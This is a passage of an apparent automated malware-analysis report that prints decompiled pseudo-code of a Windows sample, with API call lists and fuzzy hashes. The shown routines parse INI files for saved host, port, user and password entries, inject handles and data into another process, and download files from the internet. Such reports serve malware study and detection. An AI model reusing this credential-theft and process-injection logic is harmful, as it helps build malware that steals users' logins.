    						_t44 =  &(_t44[1]);
    						goto L1;
    					}
    				}
    				if(PathCombineW( &_v524, _t90, _t44) == 0) {
    					L29:
    					return 1;
    				} else {
    					if(( *_t122 & 0x00000010) == 0) {
    						_t119 = HeapAlloc( *0x42e6d4, 8, 0x20002);
    						_v640 = _t119;
    						if(_t119 != 0) {
    							_t50 = GetPrivateProfileStringW(0, 0, 0, _t119, 0xffff,  &_v532);
    							if(_t50 != 0) {
    								_t12 = _t50 + 1; // 0x1
    								if(E00411F50(_t119, _t12) != 0) {
    									_t86 = HeapAlloc( *0x42e6d4, 8, 0xc20);
    									_v648 = _t86;
    									if(_t86 != 0) {
    										_t14 =  &(_t86[0x2fd]); // 0x5fa
    										_v652 = _t14;
    										E00424100(0x72,  &_v596);
    										E00424100(0x73,  &_v608);
    										E00424100(0x74,  &_v620);
    										E00424100(0x75,  &_v628);
    										E00424100(0x76,  &_v636);
    										while(1) {
    											_t63 = StrStrIW(_t119,  &_v596);
    											if(_t63 != 0 || GetPrivateProfileStringW(_t119,  &_v612, _t63, _t86, 0xff,  &_v536) == 0) {
    												goto L22;
    											}
    											_t69 = GetPrivateProfileIntW(_t119,  &_v624, 0x15,  &_v536);
    											_v648 = _t69;
    											if(_t69 - 1 <= 0xfffe) {
    												_t87 =  &(_t86[0xff]);
    												if(GetPrivateProfileStringW(_t119,  &_v632, 0, _t87, 0xff,  &_v536) == 0) {
    													L21:
    													_t86 = _v652;
    												} else {
    													_t30 =  &(_t87[0xff]); // 0x1fe
    													_t130 = _t30;
    													if(GetPrivateProfileStringW(_t119,  &_v640, 0, _t30, 0xff,  &_v536) == 0 || E004212F0(_t130) <= 0) {
    														goto L21;
    													} else {
    														E00424100(0x55,  &_v576);
    														_push(_v648);
    														_push(_v652);
    														_t35 =  &(_t87[0xff]); // 0x1fe
    														_push(_t35);
    														_t132 = _v656;
    														_push(_t87);
    														_t78 = E00411D10(_t35, 0x311, _v656,  &_v576);
    														_t138 = _t138 + 0x14;
    														if(_t78 <= 0) {
    															goto L21;
    														} else {
    															_t133 = _a4;
    															_t80 = E00410D70(_t133, _t132, _t78);
    															_t86 = _v656;
    															if(_t80 != 0) {
    																 *((intOrPtr*)(_t133 + 4)) =  *((intOrPtr*)(_t133 + 4)) + 1;
    															}
    														}
    													}
    												}
    											}
    											L22:
    											_t64 = 0;
    											goto L23;
    											do {
    												do {
    													L23:
    													_t119 = _t119 + 2;
    												} while ( *((short*)(_t119 - 2)) != 0);
    												if( *_t119 != 0) {
    													goto L25;
    												}
    												E004107C0(_t86);
    												_t119 = _v644;
    												goto L28;
    												L25:
    												_t64 = _t64 + 1;
    											} while (_t64 != 1);
    										}
    									}
    								}
    							}
    							L28:
    							HeapFree( *0x42e6d4, 0, _t119);
    						}
    						goto L29;
    					} else {
    						_t134 =  &_v596;
    						E00424100(0x71, _t134);
    						_v652 = _t134;
    						E00418700( &_v532,  &_v652, 1, 5, E00421310, _a4, 0, 0, 0);
    						return 1;
    					}
    				}
    			}








































    APIs
    • PathCombineW.SHLWAPI(?,?,?), ref: 00421344
    • HeapAlloc.KERNEL32(?,00000008,00020002,?,?), ref: 004213AC
    • GetPrivateProfileStringW.KERNEL32 ref: 004213D0
    • HeapAlloc.KERNEL32(?,00000008,00000C20,?,?), ref: 004213FE
    • StrStrIW.SHLWAPI(00000000,?,?,?), ref: 00421466
    • GetPrivateProfileStringW.KERNEL32 ref: 00421489
    • GetPrivateProfileIntW.KERNEL32 ref: 004214A7
    • GetPrivateProfileStringW.KERNEL32 ref: 004214D9
    • GetPrivateProfileStringW.KERNEL32 ref: 00421503
    • HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 0042159F
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$Heap$Alloc$CombineFreePath
    • String ID:
    • API String ID: 592523376-0
    • Opcode ID: 2c69fdd4e42fc8f800d36a2ff43062ee6b40b7dade9e2576a769f74d1d34e595
    • Instruction ID: d855f3331f6cb8f5a420997e68b03cc794227ae0a774f833c9fbfbd933c3f3fe
    • Opcode Fuzzy Hash: 2c69fdd4e42fc8f800d36a2ff43062ee6b40b7dade9e2576a769f74d1d34e595
    • Instruction Fuzzy Hash: 1661C5717043116BE720DB51EC45BBB73A9EBD8740F80442EFA45D72A0DB78EC8587AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00420D80() {
    				void* __ebx;
    				void* __esi;
    				WCHAR* _t34;
    				long _t35;
    				signed int _t37;
    				void* _t46;
    				WCHAR* _t48;
    				void* _t57;
    				WCHAR* _t60;
    				WCHAR* _t61;
    				WCHAR* _t78;
    				WCHAR* _t86;
    				intOrPtr _t89;
    				void* _t90;
    				void* _t91;
    
    				_t34 = HeapAlloc( *0x42e6d4, 8, 0x20002);
    				_t78 = _t34;
    				 *(_t91 + 0x14) = _t78;
    				if(_t78 == 0) {
    					return _t34;
    				}
    				_t60 =  *(_t91 + 0xa0);
    				_t35 = GetPrivateProfileStringW(0, 0, 0, _t78, 0xffff, _t60);
    				if(_t35 == 0) {
    					L22:
    					return HeapFree( *0x42e6d4, 0, _t78);
    				}
    				_t37 = _t35 + 1;
    				if(_t37 < 2 ||  *((short*)(_t78 + _t37 * 2 - 2)) != 0 ||  *((short*)(_t78 + _t37 * 2 - 4)) != 0) {
    					goto L22;
    				} else {
    					_t90 = HeapAlloc( *0x42e6d4, 8, 0xc0c);
    					if(_t90 == 0) {
    						goto L22;
    					} else {
    						_t9 = _t90 + 0x5fa; // 0x5fa
    						 *((intOrPtr*)(_t91 + 0x18)) = _t9;
    						E00424100(0x65, _t91 + 0x60);
    						E00424100(0x66, _t91 + 0x28);
    						E00424100(0x67, _t91 + 0x1c);
    						E00424100(0x68, _t91 + 0x4c);
    						E00424100(0x69, _t91 + 0x38);
    						L7:
    						while(1) {
    							if(StrStrIW(_t78, _t91 + 0x60) == 0) {
    								_t48 = StrStrIW(_t78, _t91 + 0x28);
    								if(_t48 == 0 && GetPrivateProfileStringW(_t78, _t91 + 0x2c, _t48, _t90, 0xff, _t60) != 0) {
    									_t19 = _t90 + 0x1fe; // 0x1fe
    									_t61 = _t19;
    									if(GetPrivateProfileStringW(_t78, _t91 + 0x5c, 0, _t61, 0xff, _t60) != 0) {
    										_t22 =  &(_t61[0xff]); // 0x3fc
    										_t86 = _t22;
    										_t76 = _t91 + 0x48;
    										if(GetPrivateProfileStringW(_t78, _t91 + 0x48, 0, _t86, 0xff,  *(_t91 + 0xa0)) != 0) {
    											_push(_t86);
    											if(E00420BD0(_t76) > 0) {
    												_t87 = _t91 + 0x78;
    												E00424100(0x56, _t91 + 0x78);
    												_push(_t90);
    												_t25 =  &(_t61[0xff]); // 0x3fc
    												_t88 =  *((intOrPtr*)(_t91 + 0x20));
    												_push(_t61);
    												_t57 = E00411D10(_t87, 0x307,  *((intOrPtr*)(_t91 + 0x20)), _t87);
    												_t91 = _t91 + 0x10;
    												if(_t57 > 0) {
    													_t89 =  *((intOrPtr*)(_t91 + 0xa4));
    													if(E00410D70(_t89, _t88, _t57) != 0) {
    														 *((intOrPtr*)(_t89 + 4)) =  *((intOrPtr*)(_t89 + 4)) + 1;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							_t46 = 0;
    							goto L17;
    							L18:
    							if( *_t78 == 0) {
    								HeapFree( *0x42e6d4, 0, _t90);
    								_t78 =  *(_t91 + 0x14);
    								goto L22;
    							}
    							_t46 = _t46 + 1;
    							if(_t46 != 1) {
    								do {
    									goto L17;
    								} while ( *((short*)(_t78 - 2)) != 0);
    								goto L18;
    							} else {
    								_t60 =  *(_t91 + 0xa0);
    								continue;
    							}
    							L17:
    							_t78 =  &(_t78[1]);
    						}
    					}
    				}
    			}



















    APIs
    • HeapAlloc.KERNEL32(?,00000008,00020002,?,?,74B04770), ref: 00420D9D
    • GetPrivateProfileStringW.KERNEL32 ref: 00420DC1
    • HeapAlloc.KERNEL32(?,00000008,00000C0C,?,?,74B04770), ref: 00420DFF
    • StrStrIW.SHLWAPI(00000000,?,?,?,74B04770), ref: 00420E6C
    • StrStrIW.SHLWAPI(-00000002,?,?,?,74B04770), ref: 00420E7C
    • GetPrivateProfileStringW.KERNEL32 ref: 00420E94
    • GetPrivateProfileStringW.KERNEL32 ref: 00420EB7
    • GetPrivateProfileStringW.KERNEL32 ref: 00420EDD
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,74B04770), ref: 00420F66
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,74B04770), ref: 00420F7A
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapPrivateProfileString$AllocFree
    • String ID:
    • API String ID: 1207226462-0
    • Opcode ID: addb881749b7c9fc9b4f24b4024574d71cf3026cf6da6a1f484fd44322e491e0
    • Instruction ID: 5980705cce0149dfb77786b408ef8ebd71a78e5ab16da2f79c6f8b9a721692b7
    • Opcode Fuzzy Hash: addb881749b7c9fc9b4f24b4024574d71cf3026cf6da6a1f484fd44322e491e0
    • Instruction Fuzzy Hash: E151F7317403259BE7309B51ED41F7B77ECEB98744F81442EBA00A7291DBB8AC42C7A6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041CE60(void* __esi, void _a4, void _a8) {
    				void _v4;
    				char _v5;
    				intOrPtr _v8;
    				intOrPtr _t32;
    				void* _t50;
    				void* _t52;
    				void _t56;
    				void _t57;
    				void* _t73;
    				void* _t75;
    				void* _t79;
    
    				_t79 = __esi;
    				_t32 = E00417150( *0x42e90c, __esi);
    				_v8 = _t32;
    				if(_t32 == 0) {
    					L17:
    					return 0;
    				} else {
    					_v5 = 0;
    					if(DuplicateHandle(0xffffffff, _a4, __esi,  &_a4, 0, 0, 2) == 0) {
    						_v5 = 1;
    					}
    					_a8 = _a8 |  *0x42e8f8 & 0x00000014;
    					if(WriteProcessMemory(_t79, 0x42e8f8 -  *0x42e90c + _v4,  &_a8, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(WriteProcessMemory(_t79, 0x42e90c -  *0x42e90c + _v4,  &_v4, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					_t56 = _v4;
    					_t73 = 0x42edbc -  *0x42e90c;
    					if(DuplicateHandle(0xffffffff,  *0x42edbc, _t79,  &_a4, 0, 0, 2) == 0) {
    						L10:
    						_v5 = _v5 + 1;
    					} else {
    						_t52 = WriteProcessMemory(_t79, _t73 + _t56,  &_a4, 4, 0);
    						if(_t52 == 0) {
    							DuplicateHandle(_t79, _a4, _t52, _t52, _t52, _t52, 1);
    							goto L10;
    						}
    					}
    					_t57 = _v4;
    					_t75 = 0x42edc0 -  *0x42e90c;
    					if(DuplicateHandle(0xffffffff,  *0x42edc0, _t79,  &_a4, 0, 0, 2) == 0) {
    						L14:
    						_v5 = _v5 + 1;
    					} else {
    						_t50 = WriteProcessMemory(_t79, _t75 + _t57,  &_a4, 4, 0);
    						if(_t50 == 0) {
    							DuplicateHandle(_t79, _a4, _t50, _t50, _t50, _t50, 1);
    							goto L14;
    						}
    					}
    					if(_v5 == 0) {
    						return _v4;
    					} else {
    						VirtualFreeEx(_t79, _v4, 0, 0x8000);
    						goto L17;
    					}
    				}
    			}















    APIs
      • Part of subcall function 00417150: IsBadReadPtr.KERNEL32 ref: 0041716C
    • DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,00000010), ref: 0041CE9B
    • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CED3
    • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CEF7
    • DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,?,00000010), ref: 0041CF25
    • WriteProcessMemory.KERNEL32(00000000,000004B0,?,00000004,00000000,?,00000010), ref: 0041CF38
    • DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000001,?,00000010), ref: 0041CF4E
    • DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 0041CF78
    • WriteProcessMemory.KERNEL32(00000000,000004B4,?,00000004,00000000), ref: 0041CF8B
    • DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 0041CFA1
    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 0041CFBE
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: DuplicateHandle$MemoryProcessWrite$FreeReadVirtual
    • String ID:
    • API String ID: 2818436396-0
    • Opcode ID: 68563b0517ee324b51e3d9bdb349deb0da882b423a277850e86446d2d9cf373a
    • Instruction ID: 8686a2b7cfb8014808a3df94d39974e96531dd4150d5ccc0fcdd04c1316837c8
    • Opcode Fuzzy Hash: 68563b0517ee324b51e3d9bdb349deb0da882b423a277850e86446d2d9cf373a
    • Instruction Fuzzy Hash: 5241E3B23483417AE310DB51CC85FAB7BADEB89B04F408619F744A62D0D774E94AC76E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004132A0(void* _a4, WCHAR* _a8, void* _a16) {
    				intOrPtr _v4;
    				WCHAR* _v8;
    				long _v12;
    				long _v20;
    				intOrPtr _v24;
    				long _v28;
    				void* _t21;
    				long _t24;
    				long _t27;
    				long _t29;
    				intOrPtr _t33;
    				void* _t37;
    				void* _t39;
    				WCHAR* _t40;
    
    				_t40 = _a8;
    				_t29 = 0;
    				_t39 = CreateFileW(_t40, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t39 == 0xffffffff) {
    					L15:
    					return _t29;
    				}
    				_t37 = HeapAlloc( *0x42e6d4, 8, 0x1004);
    				if(_t37 == 0) {
    					L13:
    					CloseHandle(_t39);
    					if(_t29 == 0) {
    						SetFileAttributesW(_t40, 0x80);
    						DeleteFileW(_t40);
    					}
    					goto L15;
    				}
    				_v8 = 0;
    				while(1) {
    					_t21 = _a16;
    					if(_t21 != 0 && WaitForSingleObject(_t21, 0) != 0x102) {
    						break;
    					}
    					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
    						break;
    					}
    					_t24 = _v28;
    					if(_t24 == 0) {
    						FlushFileBuffers(_t39);
    						_t29 = 1;
    						break;
    					}
    					if(WriteFile(_t39, _t37, _t24,  &_v20, 0) == 0) {
    						break;
    					}
    					_t27 = _v28;
    					if(_t27 != _v20) {
    						break;
    					}
    					_t33 = _v24 + _t27;
    					_v24 = _t33;
    					if(_t33 <= _v4) {
    						continue;
    					}
    					break;
    				}
    				HeapFree( *0x42e6d4, 0, _t37);
    				_t40 = _v8;
    				goto L13;
    			}


















    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,00000001), ref: 004132BF
    • HeapAlloc.KERNEL32(?,00000008,00001004,00000000,?,00000001,?,?,?,?,?,?,?,74B5F750), ref: 004132DE
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041330B
    • InternetReadFile.WININET(?,00000000,00001000,?), ref: 00413328
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00413344
    • FlushFileBuffers.KERNEL32(00000000), ref: 00413367
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00413379
    • CloseHandle.KERNEL32(00000000,?,00000001,?,?,?,?,?,?,?,74B5F750), ref: 00413384
    • SetFileAttributesW.KERNEL32(?,00000080,00000001,?,?,?,?,?,?,?,74B5F750), ref: 00413395
    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,74B5F750), ref: 0041339C
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Heap$AllocAttributesBuffersCloseCreateDeleteFlushFreeHandleInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 4245752811-0
    • Opcode ID: 14b8162236a24ff8483f2aa182ffc03e9925cc41ce76a17b16b47d800a074eff
    • Instruction ID: a6005eaa3e22a7003f1125e1fc2b81a1038083ec1a350cbc8dc9facc59a8eaf6
    • Opcode Fuzzy Hash: 14b8162236a24ff8483f2aa182ffc03e9925cc41ce76a17b16b47d800a074eff
    • Instruction Fuzzy Hash: 9831B130244305AFD3209F25DD49F9B77A8BB84B11F400529FAA1E72E0DB74EA49C76E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041B280(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
    				intOrPtr _v8;
    				intOrPtr _v20;
    				void* _v24;
    				intOrPtr _v28;
    				void* _v32;
    				char _v36;
    				void* _v40;
    				void* _v44;
    				void* _v48;
    				void* _v52;
    				void* _v56;
    				char _v57;
    				void* _v64;
    				char _v69;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t52;
    				void* _t57;
    				void* _t63;
    				void* _t67;
    				void* _t68;
    				void* _t69;
    				intOrPtr _t70;
    				intOrPtr _t71;
    				void* _t72;
    				void* _t73;
    				void* _t74;
    				void* _t75;
    				void* _t76;
    				void* _t77;
    				void* _t79;
    				void* _t83;
    				void* _t84;
    				void* _t88;
    				void* _t90;
    				void* _t94;
    				void* _t95;
    				void* _t96;
    				void* _t98;
    				void* _t102;
    				void* _t108;
    				void* _t109;
    				void* _t110;
    				void* _t111;
    				void* _t117;
    				intOrPtr _t118;
    				void* _t121;
    				void* _t122;
    				void* _t123;
    				void* _t124;
    				void* _t131;
    				void* _t132;
    
    				_t52 = E0040C330();
    				_v56 = _t52;
    				if(_t52 == 0) {
    					L13:
    					__eflags = 0;
    					return 0;
    				} else {
    					_t117 = E00418BD0(2, 0x20000000, _t52);
    					if(_t117 == 0) {
    						L12:
    						HeapFree( *0x42e6d4, 0, _v56);
    						_t57 =  *0x42d420; // 0x0
    						ReleaseMutex(_t57);
    						CloseHandle(_t57);
    						goto L13;
    					} else {
    						_t88 = E00418C20(_t117);
    						_v40 = _t88;
    						if(_t88 == 0) {
    							goto L12;
    						} else {
    							_t118 =  *((intOrPtr*)(_t117 + 0xc));
    							_v57 = 0;
    							if(E0041A630(_t60, _t118) != 0 && _t118 != 0) {
    								_t67 = HeapAlloc( *0x42e6d4, 8, _t118 + 4);
    								_v48 = _t67;
    								if(_t67 == 0) {
    									goto L70;
    								} else {
    									_t121 = _t88;
    									_v52 = _t67;
    									while(1) {
    										L7:
    										_t7 = _t121 + 1; // 0x1
    										_t108 = _t7;
    										_t94 = 0;
    										_v44 = _t108;
    										_t68 = _t108;
    										L8:
    										while(1) {
    											if( *((char*)(_t68 - 1)) != 0) {
    												L11:
    												_t68 = _t68 + 1;
    												continue;
    											}
    											if( *_t68 == 0) {
    												_t90 = 0;
    											} else {
    												_t94 = _t94 + 1;
    												if(_t94 == 1) {
    													_t90 = _t68;
    												} else {
    													goto L11;
    												}
    											}
    											_t95 = 0;
    											__eflags = 0;
    											_t69 = _t108;
    											while(1) {
    												__eflags =  *((char*)(_t69 - 1));
    												if( *((char*)(_t69 - 1)) != 0) {
    													goto L20;
    												}
    												L18:
    												__eflags =  *_t69;
    												if( *_t69 == 0) {
    													_t131 = 0;
    												} else {
    													_t95 = _t95 + 1;
    													__eflags = _t95 - 2;
    													if(_t95 == 2) {
    														_t131 = _t69;
    													} else {
    														goto L20;
    													}
    												}
    												_t96 = _a4;
    												_t70 = 0;
    												_v36 = 0x2a3f;
    												_v32 = _t96;
    												__eflags = _t96;
    												if(_t96 != 0) {
    													__eflags =  *_t96;
    													if( *_t96 != 0) {
    														do {
    															_t70 = _t70 + 1;
    															__eflags =  *((char*)(_t70 + _t96));
    														} while ( *((char*)(_t70 + _t96)) != 0);
    													}
    												}
    												_v28 = _t70;
    												_t71 = 0;
    												_v24 = _t121;
    												__eflags = _t121;
    												if(_t121 != 0) {
    													__eflags =  *_t121;
    													if( *_t121 != 0) {
    														do {
    															_t71 = _t71 + 1;
    															__eflags =  *((char*)(_t71 + _t121));
    														} while ( *((char*)(_t71 + _t121)) != 0);
    													}
    												}
    												_v20 = _t71;
    												_v8 = 7;
    												_t72 = E00412090( &_v36);
    												__eflags = _t72;
    												if(_t72 == 0) {
    													L34:
    													_t73 = 0;
    													__eflags = _t121;
    													if(_t121 != 0) {
    														__eflags =  *_t121;
    														if( *_t121 != 0) {
    															do {
    																_t73 = _t73 + 1;
    																__eflags =  *((char*)(_t73 + _t121));
    															} while ( *((char*)(_t73 + _t121)) != 0);
    														}
    													}
    													_t109 = _t73;
    													__eflags = _t73 - 0xffffffff;
    													if(_t73 == 0xffffffff) {
    														_t109 = 0;
    														__eflags = _t121;
    														if(_t121 != 0) {
    															__eflags =  *_t121;
    															if( *_t121 != 0) {
    																do {
    																	_t109 = _t109 + 1;
    																	__eflags =  *((char*)(_t109 + _t121));
    																} while ( *((char*)(_t109 + _t121)) != 0);
    															}
    														}
    													}
    													_t122 = _v52;
    													_t74 = E00410820(_t122, _t121, _t109);
    													 *((char*)(_t109 + _t122)) = 0;
    													_t123 = _t122 + _t74 + 1;
    													_t75 = 0;
    													__eflags = _t90;
    													if(_t90 != 0) {
    														__eflags =  *_t90;
    														if( *_t90 != 0) {
    															do {
    																_t75 = _t75 + 1;
    																__eflags =  *((char*)(_t75 + _t90));
    															} while ( *((char*)(_t75 + _t90)) != 0);
    														}
    													}
    													_t110 = _t75;
    													__eflags = _t75 - 0xffffffff;
    													if(_t75 == 0xffffffff) {
    														_t110 = 0;
    														__eflags = _t90;
    														if(_t90 != 0) {
    															__eflags =  *_t90;
    															if( *_t90 != 0) {
    																do {
    																	_t110 = _t110 + 1;
    																	__eflags =  *((char*)(_t110 + _t90));
    																} while ( *((char*)(_t110 + _t90)) != 0);
    															}
    														}
    													}
    													_t76 = E00410820(_t123, _t90, _t110);
    													 *((char*)(_t110 + _t123)) = 0;
    													_t124 = _t123 + _t76 + 1;
    													_t77 = 0;
    													__eflags = _t131;
    													if(_t131 != 0) {
    														__eflags =  *_t131;
    														if( *_t131 != 0) {
    															do {
    																_t77 = _t77 + 1;
    																__eflags =  *((char*)(_t77 + _t131));
    															} while ( *((char*)(_t77 + _t131)) != 0);
    														}
    													}
    													_t111 = _t77;
    													__eflags = _t77 - 0xffffffff;
    													if(_t77 == 0xffffffff) {
    														_t102 = 0;
    														__eflags = _t131;
    														if(_t131 != 0) {
    															__eflags =  *_t131;
    															if( *_t131 != 0) {
    																do {
    																	_t102 = _t102 + 1;
    																	__eflags =  *((char*)(_t102 + _t131));
    																} while ( *((char*)(_t102 + _t131)) != 0);
    															}
    														}
    														_t111 = _t102;
    													}
    													_t98 = _t124 + E00410820(_t124, _t131, _t111) + 1;
    													 *((char*)(_t111 + _t124)) = 0;
    													_v64 = _t98;
    													 *_t98 = 0;
    												} else {
    													_t83 = E004122D0(_a8, _t90);
    													__eflags = _t83;
    													if(_t83 == 0) {
    														goto L34;
    													} else {
    														_t84 = E004122D0(_a12, _t131);
    														__eflags = _t84;
    														if(_t84 == 0) {
    															goto L34;
    														} else {
    															_t98 = _v52;
    															_v57 = 1;
    														}
    													}
    												}
    												_t121 = _v44;
    												_t79 = 0;
    												__eflags = 0;
    												while(1) {
    													__eflags =  *((char*)(_t121 - 1));
    													if( *((char*)(_t121 - 1)) != 0) {
    														goto L64;
    													}
    													L62:
    													__eflags =  *_t121;
    													if( *_t121 != 0) {
    														_t79 = _t79 + 1;
    														__eflags = _t79 - 3;
    														if(_t79 == 3) {
    															goto L7;
    														} else {
    															goto L64;
    														}
    													}
    													__eflags = _v57 - 1;
    													_t132 = _v48;
    													if(_v57 == 1) {
    														__eflags = _t98 - _t132;
    														if(_t98 == _t132) {
    															_t98 = _t98 - 1;
    															__eflags = _t98;
    														}
    														_t101 = _t98 - _t132 + 1;
    														__eflags = _t98 - _t132 + 1;
    														_v69 = E00418B90(2, _t98 - _t132 + 1,  &_v56, _t132, _t101);
    													}
    													HeapFree( *0x42e6d4, 0, _t132);
    													_t88 = _v40;
    													goto L71;
    													L64:
    													_t121 = _t121 + 1;
    													__eflags =  *((char*)(_t121 - 1));
    													if( *((char*)(_t121 - 1)) != 0) {
    														goto L64;
    													}
    													goto L62;
    												}
    												L20:
    												_t69 = _t69 + 1;
    												__eflags =  *((char*)(_t69 - 1));
    												if( *((char*)(_t69 - 1)) != 0) {
    													goto L20;
    												}
    												goto L18;
    											}
    										}
    									}
    								}
    							}
    							L71:
    							HeapFree( *0x42e6d4, 0, _t88);
    							__eflags = _v57;
    							_t63 = _v56;
    							if(_v57 == 0) {
    								__eflags = _t63;
    								if(_t63 != 0) {
    									HeapFree( *0x42e6d4, 0, _t63);
    								}
    								_t63 = 0;
    								__eflags = 0;
    							}
    							return E0040C3F0(_t63);
    						}
    					}
    				}
    			}

























































    APIs
      • Part of subcall function 0040C330: CreateMutexW.KERNEL32(0042E930,00000000,0042D490,74B05520,00000000), ref: 0040C37B
      • Part of subcall function 0040C330: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040C38A
      • Part of subcall function 0040C330: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C3B5
    • HeapAlloc.KERNEL32(?,00000008,?), ref: 0041B2EF
    • HeapFree.KERNEL32(?,00000000,?), ref: 0041B334
    • ReleaseMutex.KERNEL32(00000000), ref: 0041B342
    • CloseHandle.KERNEL32(00000000), ref: 0041B349
    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 0041B516
      • Part of subcall function 00418C20: HeapFree.KERNEL32(?,00000000,00000000,00000010,?,00000000,?,?,0041ACB1,?,?,?,743C1521,00000002), ref: 00418C74
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 0041B52E
    • HeapFree.KERNEL32(?,00000000,?), ref: 0041B548
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$AllocMutex$CloseCreateHandleObjectReleaseSingleWait
    • String ID: ?*
    • API String ID: 2942989357-3267162389
    • Opcode ID: 4790de8df53c1235fb339639d98eb2b158f4a1ccb7ed36d0660164a69d303383
    • Instruction ID: 4a123ba8b7a2ecbcc64a9486f8cc4b673b514dbb06cf6442ff29a14f08b77eea
    • Opcode Fuzzy Hash: 4790de8df53c1235fb339639d98eb2b158f4a1ccb7ed36d0660164a69d303383
    • Instruction Fuzzy Hash: F091E3709083855ED725CB3888447ABBBD5EF89314F18455EE89187382DB38DCC683DA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E004167B0() {
    				long _t54;
    				long _t58;
    				signed int _t59;
    				WCHAR* _t61;
    				long _t64;
    				long _t70;
    				long _t72;
    				signed int _t80;
    				signed int _t84;
    				signed char _t85;
    				void* _t87;
    				signed int _t96;
    				char* _t97;
    				signed short* _t98;
    				intOrPtr _t99;
    				signed int _t100;
    				void* _t107;
    				void* _t108;
    				signed int _t111;
    				void* _t113;
    
    				_t100 =  *(_t113 + 0x20) & 0x000000ff;
    				_t96 =  *(_t113 + 0x20) & 0x000000ff;
    				if(_t100 != _t96) {
    					_t54 = GetTickCount();
    					if(_t54 !=  *0x42dd08) {
    						 *0x42dd08 = _t54;
    						E00412320(_t54);
    					}
    					_t84 = E00412360() - _t55 / (_t100 - _t96 + 1) * (_t100 - _t96 + 1) + _t96;
    					 *(_t113 + 0x24) = _t84;
    					_t100 = _t84;
    				} else {
    					 *(_t113 + 0x24) = _t100;
    				}
    				_t58 = GetTickCount();
    				if(_t58 !=  *0x42dd08) {
    					 *0x42dd08 = _t58;
    					E00412320(_t58);
    				}
    				_t59 = E00412360();
    				_t97 = "bcdfghklmnpqrstvwxz";
    				if((_t59 & 0x00000100) == 0) {
    					 *(_t113 + 0xc) = "aeiouy";
    					 *(_t113 + 0x10) = "bcdfghklmnpqrstvwxz";
    				} else {
    					 *(_t113 + 0xc) = _t97;
    					 *(_t113 + 0x10) = "aeiouy";
    				}
    				_t80 = 0;
    				_t111 = 0;
    				 *(_t113 + 0x28) = 0;
    				if(_t100 > 0) {
    					 *(_t113 + 0x10) =  *(_t113 + 0x20) & 0x00000004;
    					L13:
    					while(1) {
    						if(_t80 == 2) {
    							_t72 = GetTickCount();
